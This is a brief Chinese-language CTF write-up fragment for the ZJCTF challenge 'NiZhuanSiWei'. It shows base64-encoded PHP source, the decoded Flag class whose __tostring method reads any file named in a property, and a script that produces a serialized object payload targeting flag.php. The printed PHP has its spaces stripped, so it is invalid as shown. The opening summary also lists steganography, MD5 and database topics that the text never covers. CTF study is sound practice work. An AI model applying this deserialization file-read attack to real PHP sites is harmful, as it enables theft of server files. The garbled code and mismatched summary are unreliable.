本文介绍了多个CTF(Capture The Flag)挑战,涉及PHP源码解析漏洞和安全机制。首先展示了一个名为NiZhuanSiWei的挑战,其中包含了base64编码和文件包含漏洞。接着,讨论了类 Flag 的使用,通过序列化来触发文件读取。最后,提到了一个条件判断下的隐写术,用于隐藏flag。文章还涵盖了数据库查询与密码验证的MD5用法,以及参数比较与安全防护的实践。
welcome to the zjctf
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
<?phpclassFlag{//flag.php public$file;publicfunction__tostring(){if(isset($this->file)){echofile_get_contents($this->file);echo"<br>";return("U R SO CLOSE !///COME ON PLZ");}}}?>
<?phpclassFlag{//flag.php public$file;publicfunction__tostring(){if(isset($this->file)){echofile_get_contents($this->file);echo"<br>";return("U R SO CLOSE !///COME ON PLZ");}}}$a=newFlag();$a->file="flag.php";echoserialize($a);?>// O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}